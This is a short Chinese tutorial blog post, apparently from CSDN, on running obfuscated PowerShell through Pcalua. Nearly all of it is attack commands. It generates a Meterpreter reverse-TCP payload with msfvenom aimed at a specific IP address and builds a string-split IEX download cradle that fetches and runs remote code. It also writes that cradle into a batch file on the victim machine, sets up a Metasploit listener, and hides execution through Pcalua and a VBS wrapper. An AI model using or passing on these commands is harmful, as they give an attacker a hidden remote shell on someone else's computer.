Pcalua+Powershell混淆

一、Pcalua加载shellcode

1、msfvenom生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1

2、混淆处理

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"

3、被攻击机写入bat

type nul > 1.bat
echo powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"> 1.bat

4、msf设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 39.104.56.140
set LPORT 7100
exploit

5、cmd Pcalua运行1.bat

Pcalua -m -a 1.bat

二、powershell混淆

1、

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://x.X.X.X:7200/a.ps1''))';IEX ($a+$b)"

2、通过vbs执行bat不会弹出cmd
3、vbs文件

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c start.bat",vbhide

4、结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值